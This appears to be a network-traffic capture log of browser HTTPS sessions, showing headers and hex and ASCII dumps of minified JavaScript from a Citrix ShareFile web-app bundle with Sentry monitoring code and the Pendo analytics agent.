                                                                                                                                                                                                                                                                                Cookie: AWSALBTG=zqYjAjHLfmVRcfIFxuueIGROo469AAXVoDwNA+xtHvAkdxVdCaJD0sSaMaCXoEihiZMgXyHVv35hCZdb7JSTo74PMem6xAUfhMAKCO7+yucoST10f8eV8Q9RWueNlnqbgVwEv2Lp4ZQPBsQWs57Qbs54x+U3UaavsCz3S+IXBIfR; AWSALBTGCORS=zqYjAjHLfmVRcfIFxuueIGROo469AAXVoDwNA+xtHvAkdxVdCaJD0sSaMaCXoEihiZMgXyHVv35hCZdb7JSTo74PMem6xAUfhMAKCO7+yucoST10f8eV8Q9RWueNlnqbgVwEv2Lp4ZQPBsQWs57Qbs54x+U3UaavsCz3S+IXBIfR; AWSALB=EDLmDV8hCsbRGCTtXo43ZQn446NWQyTf7b7biDcCGEz0N7IF1p/dUwpTMkhLZxhOWnYtsS6rNxHYfZT7lpdjaoac59gKpD40PnFo7g/PlN9ExJ+fJDnpQwZ/GjYJ; AWSALBCORS=EDLmDV8hCsbRGCTtXo43ZQn446NWQyTf7b7biDcCGEz0N7IF1p/dUwpTMkhLZxhOWnYtsS6rNxHYfZT7lpdjaoac59gKpD40PnFo7g/PlN9ExJ+fJDnpQwZ/GjYJ
                                                                                                                                                                                                                                                                                2024-10-09 18:05:12 UTC1431INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Wed, 09 Oct 2024 18:05:12 GMT
                                                                                                                                                                                                                                                                                Content-Type: application/javascript
                                                                                                                                                                                                                                                                                Content-Length: 310527
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Set-Cookie: AWSALBTG=gR5RnG/HQtkNnRHXJegyXof69428+bMpq8FZtPR/yXKNb02dRW5QkyVHbRIJuf2QeX3muAspAup1v6cVWisH7YYmO9+kc12aPtfphu7HX2xgeKBfqZFjZ+G3ID9fXWiLOaLPfoG64zkKRz4HJlXVIc/LrbZgw1hqTPca63ByRnR3; Expires=Wed, 16 Oct 2024 18:05:12 GMT; Path=/
                                                                                                                                                                                                                                                                                Set-Cookie: AWSALBTGCORS=gR5RnG/HQtkNnRHXJegyXof69428+bMpq8FZtPR/yXKNb02dRW5QkyVHbRIJuf2QeX3muAspAup1v6cVWisH7YYmO9+kc12aPtfphu7HX2xgeKBfqZFjZ+G3ID9fXWiLOaLPfoG64zkKRz4HJlXVIc/LrbZgw1hqTPca63ByRnR3; Expires=Wed, 16 Oct 2024 18:05:12 GMT; Path=/; SameSite=None; Secure
                                                                                                                                                                                                                                                                                Set-Cookie: AWSALB=44LiOl/CX8oE0u4aCu67nd6n+HtrL+juO4HhBIerrKBkKsfD37AFWpj423aOwwekymdvQu3TFyg/pyX+61TL/AzZvj6OiKvwBF0BKi5FgfLntRD2zDz/wqOz0i4m; Expires=Wed, 16 Oct 2024 18:05:12 GMT; Path=/
                                                                                                                                                                                                                                                                                Set-Cookie: AWSALBCORS=44LiOl/CX8oE0u4aCu67nd6n+HtrL+juO4HhBIerrKBkKsfD37AFWpj423aOwwekymdvQu3TFyg/pyX+61TL/AzZvj6OiKvwBF0BKi5FgfLntRD2zDz/wqOz0i4m; Expires=Wed, 16 Oct 2024 18:05:12 GMT; Path=/; SameSite=None; Secure
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                Cache-Control: no-store, must-revalidate, no-cache, private
                                                                                                                                                                                                                                                                                Content-Language: en
                                                                                                                                                                                                                                                                                ETag: "1db18773a889bff"
                                                                                                                                                                                                                                                                                Expires: 0
                                                                                                                                                                                                                                                                                Last-Modified: Mon, 07 Oct 2024 05:10:30 GMT
                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                X-XSS-Protection: 1;mode=block
                                                                                                                                                                                                                                                                                Referrer-Policy: same-origin
                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=16000000;includeSubDomains;preload
                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                2024-10-09 18:05:12 UTC8459INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 73 68 61 72 65 66 69 6c 65 64 65 76 5f 73 68 61 72 65 66 69 6c 65 5f 61 70 70 73 68 65 6c 6c 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 73 68 61 72 65 66 69 6c 65 64 65 76 5f 73 68 61 72 65 66 69 6c 65 5f 61 70 70 73 68 65 6c 6c 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 31 33 36 30 5d 2c 7b 33 31 33 36 30 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 6e 2e 72 28 65 29 2c 6e 2e 64 28 65 2c 7b 42 72 65 61 64 63 72 75 6d 62 73 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 44 6f 7d 2c 42 72 6f 77 73 65 72 43 6c 69 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 41 73 7d 2c 42 72 6f 77 73 65 72 50 72 6f 66 69 6c 69 6e 67
                                                                                                                                                                                                                                                                                Data Ascii: "use strict";(self.webpackChunk_sharefiledev_sharefile_appshell=self.webpackChunk_sharefiledev_sharefile_appshell||[]).push([[1360],{31360:function(t,e,n){n.r(e),n.d(e,{Breadcrumbs:function(){return Do},BrowserClient:function(){return As},BrowserProfiling
                                                                                                                                                                                                                                                                                2024-10-09 18:05:12 UTC16384INData Raw: 7b 74 3d 21 31 7d 2c 69 73 45 6e 61 62 6c 65 64 3a 28 29 3d 3e 74 7d 3b 72 65 74 75 72 6e 20 4d 3f 4f 2e 66 6f 72 45 61 63 68 28 28 6e 3d 3e 7b 65 5b 6e 5d 3d 28 2e 2e 2e 65 29 3d 3e 7b 74 26 26 44 28 28 28 29 3d 3e 7b 62 2e 63 6f 6e 73 6f 6c 65 5b 6e 5d 28 60 53 65 6e 74 72 79 20 4c 6f 67 67 65 72 20 5b 24 7b 6e 7d 5d 3a 60 2c 2e 2e 2e 65 29 7d 29 29 7d 7d 29 29 3a 4f 2e 66 6f 72 45 61 63 68 28 28 74 3d 3e 7b 65 5b 74 5d 3d 28 29 3d 3e 7b 7d 7d 29 29 2c 65 7d 28 29 3b 66 75 6e 63 74 69 6f 6e 20 4c 28 74 2c 65 3d 30 29 7b 72 65 74 75 72 6e 22 73 74 72 69 6e 67 22 21 3d 74 79 70 65 6f 66 20 74 7c 7c 30 3d 3d 3d 65 7c 7c 74 2e 6c 65 6e 67 74 68 3c 3d 65 3f 74 3a 60 24 7b 74 2e 73 6c 69 63 65 28 30 2c 65 29 7d 2e 2e 2e 60 7d 66 75 6e 63 74 69 6f 6e 20 50 28
                                                                                                                                                                                                                                                                                Data Ascii: {t=!1},isEnabled:()=>t};return M?O.forEach((n=>{e[n]=(...e)=>{t&&D((()=>{b.console[n](`Sentry Logger [${n}]:`,...e)}))}})):O.forEach((t=>{e[t]=()=>{}})),e}();function L(t,e=0){return"string"!=typeof t||0===e||t.length<=e?t:`${t.slice(0,e)}...`}function P(
                                                                                                                                                                                                                                                                                2024-10-09 18:05:12 UTC16384INData Raw: 3b 69 66 28 21 74 68 69 73 2e 5f 63 6c 69 65 6e 74 29 72 65 74 75 72 6e 20 4e 2e 77 61 72 6e 28 22 4e 6f 20 63 6c 69 65 6e 74 20 63 6f 6e 66 69 67 75 72 65 64 20 6f 6e 20 73 63 6f 70 65 20 2d 20 77 69 6c 6c 20 6e 6f 74 20 63 61 70 74 75 72 65 20 65 78 63 65 70 74 69 6f 6e 21 22 29 2c 6e 3b 63 6f 6e 73 74 20 72 3d 6e 65 77 20 45 72 72 6f 72 28 22 53 65 6e 74 72 79 20 73 79 6e 74 68 65 74 69 63 45 78 63 65 70 74 69 6f 6e 22 29 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 63 6c 69 65 6e 74 2e 63 61 70 74 75 72 65 45 78 63 65 70 74 69 6f 6e 28 74 2c 7b 6f 72 69 67 69 6e 61 6c 45 78 63 65 70 74 69 6f 6e 3a 74 2c 73 79 6e 74 68 65 74 69 63 45 78 63 65 70 74 69 6f 6e 3a 72 2c 2e 2e 2e 65 2c 65 76 65 6e 74 5f 69 64 3a 6e 7d 2c 74 68 69 73 29 2c 6e 7d 63 61 70 74 75
                                                                                                                                                                                                                                                                                Data Ascii: ;if(!this._client)return N.warn("No client configured on scope - will not capture exception!"),n;const r=new Error("Sentry syntheticException");return this._client.captureException(t,{originalException:t,syntheticException:r,...e,event_id:n},this),n}captu
                                                                                                                                                                                                                                                                                2024-10-09 18:05:12 UTC16384INData Raw: 68 65 64 20 62 79 20 5c 60 69 67 6e 6f 72 65 45 72 72 6f 72 73 5c 60 20 6f 70 74 69 6f 6e 2e 5c 6e 45 76 65 6e 74 3a 20 24 7b 5a 28 74 29 7d 60 29 2c 21 30 3b 69 66 28 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 69 66 28 22 74 72 61 6e 73 61 63 74 69 6f 6e 22 21 3d 3d 74 2e 74 79 70 65 7c 7c 21 65 7c 7c 21 65 2e 6c 65 6e 67 74 68 29 72 65 74 75 72 6e 21 31 3b 63 6f 6e 73 74 20 6e 3d 74 2e 74 72 61 6e 73 61 63 74 69 6f 6e 3b 72 65 74 75 72 6e 21 21 6e 26 26 46 28 6e 2c 65 29 7d 28 74 2c 65 2e 69 67 6e 6f 72 65 54 72 61 6e 73 61 63 74 69 6f 6e 73 29 29 72 65 74 75 72 6e 20 4b 26 26 4e 2e 77 61 72 6e 28 60 45 76 65 6e 74 20 64 72 6f 70 70 65 64 20 64 75 65 20 74 6f 20 62 65 69 6e 67 20 6d 61 74 63 68 65 64 20 62 79 20 5c 60 69 67 6e 6f 72 65 54 72 61 6e 73 61
                                                                                                                                                                                                                                                                                Data Ascii: hed by \`ignoreErrors\` option.\nEvent: ${Z(t)}`),!0;if(function(t,e){if("transaction"!==t.type||!e||!e.length)return!1;const n=t.transaction;return!!n&&F(n,e)}(t,e.ignoreTransactions))return K&&N.warn(`Event dropped due to being matched by \`ignoreTransa
                                                                                                                                                                                                                                                                                2024-10-09 18:05:12 UTC16384INData Raw: 6e 22 70 65 72 6d 69 73 73 69 6f 6e 5f 64 65 6e 69 65 64 22 3b 63 61 73 65 20 34 30 34 3a 72 65 74 75 72 6e 22 6e 6f 74 5f 66 6f 75 6e 64 22 3b 63 61 73 65 20 34 30 39 3a 72 65 74 75 72 6e 22 61 6c 72 65 61 64 79 5f 65 78 69 73 74 73 22 3b 63 61 73 65 20 34 31 33 3a 72 65 74 75 72 6e 22 66 61 69 6c 65 64 5f 70 72 65 63 6f 6e 64 69 74 69 6f 6e 22 3b 63 61 73 65 20 34 32 39 3a 72 65 74 75 72 6e 22 72 65 73 6f 75 72 63 65 5f 65 78 68 61 75 73 74 65 64 22 3b 64 65 66 61 75 6c 74 3a 72 65 74 75 72 6e 22 69 6e 76 61 6c 69 64 5f 61 72 67 75 6d 65 6e 74 22 7d 69 66 28 74 3e 3d 35 30 30 26 26 74 3c 36 30 30 29 73 77 69 74 63 68 28 74 29 7b 63 61 73 65 20 35 30 31 3a 72 65 74 75 72 6e 22 75 6e 69 6d 70 6c 65 6d 65 6e 74 65 64 22 3b 63 61 73 65 20 35 30 33 3a 72 65
                                                                                                                                                                                                                                                                                Data Ascii: n"permission_denied";case 404:return"not_found";case 409:return"already_exists";case 413:return"failed_precondition";case 429:return"resource_exhausted";default:return"invalid_argument"}if(t>=500&&t<600)switch(t){case 501:return"unimplemented";case 503:re
                                                                                                                                                                                                                                                                                2024-10-09 18:05:12 UTC16384INData Raw: 74 65 2e 22 29 2c 74 2e 73 61 6d 70 6c 65 64 3d 21 31 2c 74 29 7d 66 75 6e 63 74 69 6f 6e 20 57 72 28 29 7b 63 6f 6e 73 74 20 74 3d 74 68 69 73 2e 67 65 74 53 63 6f 70 65 28 29 2e 67 65 74 53 70 61 6e 28 29 3b 72 65 74 75 72 6e 20 74 3f 7b 22 73 65 6e 74 72 79 2d 74 72 61 63 65 22 3a 41 74 28 74 29 7d 3a 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 56 72 28 74 2c 65 29 7b 63 6f 6e 73 74 20 6e 3d 74 68 69 73 2e 67 65 74 43 6c 69 65 6e 74 28 29 2c 72 3d 6e 26 26 6e 2e 67 65 74 4f 70 74 69 6f 6e 73 28 29 7c 7c 7b 7d 2c 73 3d 72 2e 69 6e 73 74 72 75 6d 65 6e 74 65 72 7c 7c 22 73 65 6e 74 72 79 22 2c 6f 3d 74 2e 69 6e 73 74 72 75 6d 65 6e 74 65 72 7c 7c 22 73 65 6e 74 72 79 22 3b 73 21 3d 3d 6f 26 26 28 4b 26 26 4e 2e 65 72 72 6f 72 28 60 41 20 74 72 61 6e 73 61 63 74
                                                                                                                                                                                                                                                                                Data Ascii: te."),t.sampled=!1,t)}function Wr(){const t=this.getScope().getSpan();return t?{"sentry-trace":At(t)}:{}}function Vr(t,e){const n=this.getClient(),r=n&&n.getOptions()||{},s=r.instrumenter||"sentry",o=t.instrumenter||"sentry";s!==o&&(K&&N.error(`A transact
                                                                                                                                                                                                                                                                                2024-10-09 18:05:12 UTC16384INData Raw: 4c 69 73 74 65 6e 65 72 28 22 6b 65 79 70 72 65 73 73 22 2c 65 2c 21 31 29 2c 5b 22 45 76 65 6e 74 54 61 72 67 65 74 22 2c 22 4e 6f 64 65 22 5d 2e 66 6f 72 45 61 63 68 28 28 65 3d 3e 7b 63 6f 6e 73 74 20 6e 3d 75 6f 5b 65 5d 26 26 75 6f 5b 65 5d 2e 70 72 6f 74 6f 74 79 70 65 3b 6e 26 26 6e 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 26 26 6e 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 22 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 22 29 26 26 28 42 28 6e 2c 22 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 22 2c 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 6e 2c 72 2c 73 29 7b 69 66 28 22 63 6c 69 63 6b 22 3d 3d 3d 6e 7c 7c 22 6b 65 79 70 72 65 73 73 22 3d 3d 6e 29 74 72 79 7b 63 6f 6e 73 74 20 72 3d 74
                                                                                                                                                                                                                                                                                Data Ascii: Listener("keypress",e,!1),["EventTarget","Node"].forEach((e=>{const n=uo[e]&&uo[e].prototype;n&&n.hasOwnProperty&&n.hasOwnProperty("addEventListener")&&(B(n,"addEventListener",(function(e){return function(n,r,s){if("click"===n||"keypress"==n)try{const r=t
                                                                                                                                                                                                                                                                                2024-10-09 18:05:12 UTC16384INData Raw: 61 72 64 22 3a 31 3d 3d 3d 65 3f 22 72 65 6c 6f 61 64 22 3a 22 6e 61 76 69 67 61 74 65 22 7d 3b 66 6f 72 28 63 6f 6e 73 74 20 65 20 69 6e 20 74 29 22 6e 61 76 69 67 61 74 69 6f 6e 53 74 61 72 74 22 21 3d 3d 65 26 26 22 74 6f 4a 53 4f 4e 22 21 3d 3d 65 26 26 28 6e 5b 65 5d 3d 4d 61 74 68 2e 6d 61 78 28 74 5b 65 5d 2d 74 2e 6e 61 76 69 67 61 74 69 6f 6e 53 74 61 72 74 2c 30 29 29 3b 72 65 74 75 72 6e 20 6e 7d 29 28 29 29 3a 6b 69 2e 70 65 72 66 6f 72 6d 61 6e 63 65 26 26 70 65 72 66 6f 72 6d 61 6e 63 65 2e 67 65 74 45 6e 74 72 69 65 73 42 79 54 79 70 65 26 26 70 65 72 66 6f 72 6d 61 6e 63 65 2e 67 65 74 45 6e 74 72 69 65 73 42 79 54 79 70 65 28 22 6e 61 76 69 67 61 74 69 6f 6e 22 29 5b 30 5d 2c 45 69 3d 28 29 3d 3e 7b 63 6f 6e 73 74 20 74 3d 77 69 28 29 3b
                                                                                                                                                                                                                                                                                Data Ascii: ard":1===e?"reload":"navigate"};for(const e in t)"navigationStart"!==e&&"toJSON"!==e&&(n[e]=Math.max(t[e]-t.navigationStart,0));return n})()):ki.performance&&performance.getEntriesByType&&performance.getEntriesByType("navigation")[0],Ei=()=>{const t=wi();
                                                                                                                                                                                                                                                                                2024-10-09 18:05:12 UTC16384INData Raw: 2e 61 74 74 72 69 62 75 74 65 73 2e 6e 61 6d 65 29 29 29 72 65 74 75 72 6e 21 30 3b 69 66 28 65 2e 68 65 61 64 4d 65 74 61 48 74 74 70 45 71 75 69 76 26 26 76 6f 69 64 20 30 21 3d 3d 74 2e 61 74 74 72 69 62 75 74 65 73 5b 22 68 74 74 70 2d 65 71 75 69 76 22 5d 29 72 65 74 75 72 6e 21 30 3b 69 66 28 65 2e 68 65 61 64 4d 65 74 61 41 75 74 68 6f 72 73 68 69 70 26 26 28 22 61 75 74 68 6f 72 22 3d 3d 3d 46 61 28 74 2e 61 74 74 72 69 62 75 74 65 73 2e 6e 61 6d 65 29 7c 7c 22 67 65 6e 65 72 61 74 6f 72 22 3d 3d 3d 46 61 28 74 2e 61 74 74 72 69 62 75 74 65 73 2e 6e 61 6d 65 29 7c 7c 22 66 72 61 6d 65 77 6f 72 6b 22 3d 3d 3d 46 61 28 74 2e 61 74 74 72 69 62 75 74 65 73 2e 6e 61 6d 65 29 7c 7c 22 70 75 62 6c 69 73 68 65 72 22 3d 3d 3d 46 61 28 74 2e 61 74 74 72 69
                                                                                                                                                                                                                                                                                Data Ascii: .attributes.name)))return!0;if(e.headMetaHttpEquiv&&void 0!==t.attributes["http-equiv"])return!0;if(e.headMetaAuthorship&&("author"===Fa(t.attributes.name)||"generator"===Fa(t.attributes.name)||"framework"===Fa(t.attributes.name)||"publisher"===Fa(t.attri
                                                                                                                                                                                                                                                                                2024-10-09 18:05:12 UTC16384INData Raw: 61 63 68 28 28 65 3d 3e 74 68 69 73 2e 67 65 6e 41 64 64 73 28 65 2c 74 2e 74 61 72 67 65 74 29 29 29 2c 74 2e 72 65 6d 6f 76 65 64 4e 6f 64 65 73 2e 66 6f 72 45 61 63 68 28 28 65 3d 3e 7b 63 6f 6e 73 74 20 6e 3d 74 68 69 73 2e 6d 69 72 72 6f 72 2e 67 65 74 49 64 28 65 29 2c 72 3d 73 61 28 74 2e 74 61 72 67 65 74 29 3f 74 68 69 73 2e 6d 69 72 72 6f 72 2e 67 65 74 49 64 28 74 2e 74 61 72 67 65 74 2e 68 6f 73 74 29 3a 74 68 69 73 2e 6d 69 72 72 6f 72 2e 67 65 74 49 64 28 74 2e 74 61 72 67 65 74 29 3b 5a 61 28 74 2e 74 61 72 67 65 74 2c 74 68 69 73 2e 62 6c 6f 63 6b 43 6c 61 73 73 2c 74 68 69 73 2e 62 6c 6f 63 6b 53 65 6c 65 63 74 6f 72 2c 74 68 69 73 2e 75 6e 62 6c 6f 63 6b 53 65 6c 65 63 74 6f 72 2c 21 31 29 7c 7c 51 61 28 65 2c 74 68 69 73 2e 6d 69 72 72
                                                                                                                                                                                                                                                                                Data Ascii: ach((e=>this.genAdds(e,t.target))),t.removedNodes.forEach((e=>{const n=this.mirror.getId(e),r=sa(t.target)?this.mirror.getId(t.target.host):this.mirror.getId(t.target);Za(t.target,this.blockClass,this.blockSelector,this.unblockSelector,!1)||Qa(e,this.mirr


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                28192.168.2.64975034.111.138.514432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:12 UTC424OUTGET /agent/static/74b07336-7560-45fc-7cd1-95032a784d52/pendo.js HTTP/1.1
                                                                                                                                                                                                                                                                                Host: citrix-sharefile-content.customer.pendo.io
                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                2024-10-09 18:05:12 UTC915INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                accept-ranges: bytes
                                                                                                                                                                                                                                                                                access-control-allow-origin: *
                                                                                                                                                                                                                                                                                access-control-expose-headers: *
                                                                                                                                                                                                                                                                                server: istio-envoy
                                                                                                                                                                                                                                                                                x-goog-generation: 1728494266207575
                                                                                                                                                                                                                                                                                x-goog-hash: crc32c=gIFftw==
                                                                                                                                                                                                                                                                                x-goog-hash: md5=B6WD3l1nU2y9imWIXC7z9w==
                                                                                                                                                                                                                                                                                x-goog-metageneration: 1
                                                                                                                                                                                                                                                                                x-goog-storage-class: STANDARD
                                                                                                                                                                                                                                                                                x-goog-stored-content-encoding: gzip
                                                                                                                                                                                                                                                                                x-goog-stored-content-length: 163598
                                                                                                                                                                                                                                                                                x-guploader-uploadid: AHmUCY36tdghtF6cFIxBRUSrZDpZnxTWb2xkylRdPJP6Pe1pI3AxyFryXxcySTsMEKaK0c-g0TMwKDoh-w
                                                                                                                                                                                                                                                                                x-envoy-upstream-service-time: 51
                                                                                                                                                                                                                                                                                Via: 1.1 google
                                                                                                                                                                                                                                                                                Date: Wed, 09 Oct 2024 18:05:11 GMT
                                                                                                                                                                                                                                                                                Expires: Wed, 09 Oct 2024 18:12:41 GMT
                                                                                                                                                                                                                                                                                Cache-Control: max-age=450
                                                                                                                                                                                                                                                                                Last-Modified: Wed, 09 Oct 2024 17:17:46 GMT
                                                                                                                                                                                                                                                                                ETag: "07a583de5d67536cbd8a65885c2ef3f7"
                                                                                                                                                                                                                                                                                Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Age: 1
                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=63072000
                                                                                                                                                                                                                                                                                Alt-Svc: clear
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                2024-10-09 18:05:12 UTC475INData Raw: 38 30 30 30 0d 0a 2f 2f 20 50 65 6e 64 6f 20 41 67 65 6e 74 20 57 72 61 70 70 65 72 0a 2f 2f 20 43 6f 70 79 72 69 67 68 74 20 32 30 32 34 20 50 65 6e 64 6f 2e 69 6f 2c 20 49 6e 63 2e 0a 2f 2f 20 45 6e 76 69 72 6f 6e 6d 65 6e 74 3a 20 20 20 20 70 72 6f 64 75 63 74 69 6f 6e 0a 2f 2f 20 41 67 65 6e 74 20 56 65 72 73 69 6f 6e 3a 20 20 32 2e 32 34 39 2e 31 0a 2f 2f 20 49 6e 73 74 61 6c 6c 65 64 3a 20 20 20 20 20 20 32 30 32 34 2d 31 30 2d 30 39 54 31 37 3a 31 37 3a 34 34 5a 0a 28 66 75 6e 63 74 69 6f 6e 20 28 50 65 6e 64 6f 43 6f 6e 66 69 67 29 20 7b 0a 2f 2a 0a 40 6c 69 63 65 6e 73 65 20 68 74 74 70 73 3a 2f 2f 61 67 65 6e 74 2e 70 65 6e 64 6f 2e 69 6f 2f 6c 69 63 65 6e 73 65 73 0a 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 48 62 2c 6a 62 2c 57 62 29 7b 21 66 75
                                                                                                                                                                                                                                                                                Data Ascii: 8000// Pendo Agent Wrapper// Copyright 2024 Pendo.io, Inc.// Environment: production// Agent Version: 2.249.1// Installed: 2024-10-09T17:17:44Z(function (PendoConfig) {/*@license https://agent.pendo.io/licenses*/!function(Hb,jb,Wb){!fu
                                                                                                                                                                                                                                                                                2024-10-09 18:05:12 UTC1390INData Raw: 2c 74 29 3b 76 61 72 20 6e 2c 69 3d 5b 5d 2c 72 3d 74 68 69 73 2e 6c 65 6e 67 74 68 2c 6f 3d 65 7c 7c 30 2c 61 3d 28 74 3c 30 3f 72 2b 74 3a 74 7c 7c 72 29 2d 28 6f 3d 30 3c 3d 6f 3f 6f 3a 72 2b 6f 29 3b 69 66 28 30 3c 61 29 69 66 28 69 3d 6e 65 77 20 41 72 72 61 79 28 61 29 2c 74 68 69 73 2e 63 68 61 72 41 74 29 66 6f 72 28 6e 3d 30 3b 6e 3c 61 3b 6e 2b 2b 29 69 5b 6e 5d 3d 74 68 69 73 2e 63 68 61 72 41 74 28 6f 2b 6e 29 3b 65 6c 73 65 20 66 6f 72 28 6e 3d 30 3b 6e 3c 61 3b 6e 2b 2b 29 69 5b 6e 5d 3d 74 68 69 73 5b 6f 2b 6e 5d 3b 72 65 74 75 72 6e 20 69 7d 7d 53 74 72 69 6e 67 2e 70 72 6f 74 6f 74 79 70 65 2e 74 72 69 6d 7c 7c 28 53 74 72 69 6e 67 2e 70 72 6f 74 6f 74 79 70 65 2e 74 72 69 6d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68
                                                                                                                                                                                                                                                                                Data Ascii: ,t);var n,i=[],r=this.length,o=e||0,a=(t<0?r+t:t||r)-(o=0<=o?o:r+o);if(0<a)if(i=new Array(a),this.charAt)for(n=0;n<a;n++)i[n]=this.charAt(o+n);else for(n=0;n<a;n++)i[n]=this[o+n];return i}}String.prototype.trim||(String.prototype.trim=function(){return th
                                                                                                                                                                                                                                                                                2024-10-09 18:05:12 UTC1390INData Raw: 64 61 74 65 28 65 29 5b 74 5d 28 29 7d 7d 2c 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 61 28 22 68 65 78 22 29 3b 28 74 3d 69 3f 63 28 74 29 3a 74 29 2e 63 72 65 61 74 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 6c 7d 2c 74 2e 75 70 64 61 74 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 2e 63 72 65 61 74 65 28 29 2e 75 70 64 61 74 65 28 65 29 7d 3b 66 6f 72 28 76 61 72 20 65 3d 30 3b 65 3c 72 2e 6c 65 6e 67 74 68 3b 2b 2b 65 29 7b 76 61 72 20 6e 3d 72 5b 65 5d 3b 74 5b 6e 5d 3d 61 28 6e 29 7d 72 65 74 75 72 6e 20 74 7d 2c 63 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 65 76 61 6c 28 22 72 65 71 75 69 72 65 28 27 63 72 79 70 74 6f 27 29 22 29 2c 69 3d 65 76 61 6c 28 22 72 65 71 75
                                                                                                                                                                                                                                                                                Data Ascii: date(e)[t]()}},d=function(){var t=a("hex");(t=i?c(t):t).create=function(){return new l},t.update=function(e){return t.create().update(e)};for(var e=0;e<r.length;++e){var n=r[e];t[n]=a(n)}return t},c=function(t){var n=eval("require('crypto')"),i=eval("requ
                                                                                                                                                                                                                                                                                2024-10-09 18:05:12 UTC1390INData Raw: 33 34 34 3c 3d 74 3f 61 5b 6e 3e 3e 32 5d 7c 3d 28 32 32 34 7c 74 3e 3e 31 32 29 3c 3c 75 5b 33 26 6e 2b 2b 5d 3a 28 74 3d 36 35 35 33 36 2b 28 28 31 30 32 33 26 74 29 3c 3c 31 30 7c 31 30 32 33 26 65 2e 63 68 61 72 43 6f 64 65 41 74 28 2b 2b 72 29 29 2c 61 5b 6e 3e 3e 32 5d 7c 3d 28 32 34 30 7c 74 3e 3e 31 38 29 3c 3c 75 5b 33 26 6e 2b 2b 5d 2c 61 5b 6e 3e 3e 32 5d 7c 3d 28 31 32 38 7c 74 3e 3e 31 32 26 36 33 29 3c 3c 75 5b 33 26 6e 2b 2b 5d 29 2c 61 5b 6e 3e 3e 32 5d 7c 3d 28 31 32 38 7c 74 3e 3e 36 26 36 33 29 3c 3c 75 5b 33 26 6e 2b 2b 5d 29 2c 61 5b 6e 3e 3e 32 5d 7c 3d 28 31 32 38 7c 36 33 26 74 29 3c 3c 75 5b 33 26 6e 2b 2b 5d 29 3b 74 68 69 73 2e 6c 61 73 74 42 79 74 65 49 6e 64 65 78 3d 6e 2c 74 68 69 73 2e 62 79 74 65 73 2b 3d 6e 2d 74 68 69 73
                                                                                                                                                                                                                                                                                Data Ascii: 344<=t?a[n>>2]|=(224|t>>12)<<u[3&n++]:(t=65536+((1023&t)<<10|1023&e.charCodeAt(++r)),a[n>>2]|=(240|t>>18)<<u[3&n++],a[n>>2]|=(128|t>>12&63)<<u[3&n++]),a[n>>2]|=(128|t>>6&63)<<u[3&n++]),a[n>>2]|=(128|63&t)<<u[3&n++]);this.lastByteIndex=n,this.bytes+=n-this
